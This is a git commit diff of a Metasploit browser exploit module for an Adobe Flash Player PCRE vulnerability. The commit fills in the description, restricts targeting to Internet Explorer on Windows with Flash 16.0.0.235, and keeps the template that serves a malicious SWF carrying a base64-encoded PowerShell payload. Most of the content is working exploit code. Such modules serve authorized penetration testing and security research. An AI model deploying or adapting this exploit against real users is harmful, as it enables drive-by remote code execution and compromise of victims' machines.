Final
sinn3r
parent
2a25e2b2e1
commit
2b199315d4
|
|
@ -17,12 +17,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => "Adobe Flash Player PCRE Regex Vulnerability",
|
||||
'Description' => %q{
|
||||
Flash
|
||||
This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
|
||||
in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
|
||||
a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mark Brand' # Found vuln
|
||||
'Mark Brand', # Found vuln
|
||||
'sinn3r' # MSF
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -37,8 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
# 'InitialAutoRunScript' => 'migrate -f',
|
||||
'Retries' => false
|
||||
'Retries' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
|
|
@ -48,7 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:method => "LoadMovie",
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
#:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
|
||||
# Ohter versions are vulnerable but .235 is the one that works for me pretty well
|
||||
# So we're gonna limit to this one for now. More validation needed in the future.
|
||||
:flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.235' }
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
@ -60,6 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
# Please see data/exploits/CVE-2015-0318/ for source,
|
||||
# that's where the actual exploit is
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
|
@ -81,7 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
|
||||
|
|
@ -96,18 +101,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
|
||||
</object>
|
||||
|
||||
<script>
|
||||
function debug_alert(msg) {
|
||||
console.log(msg);
|
||||
}
|
||||
|
||||
function debug_print(msg) {
|
||||
console.log(msg);
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html_template, binding()
|
||||
|
|
|
|||
Loading…
Reference in New Issue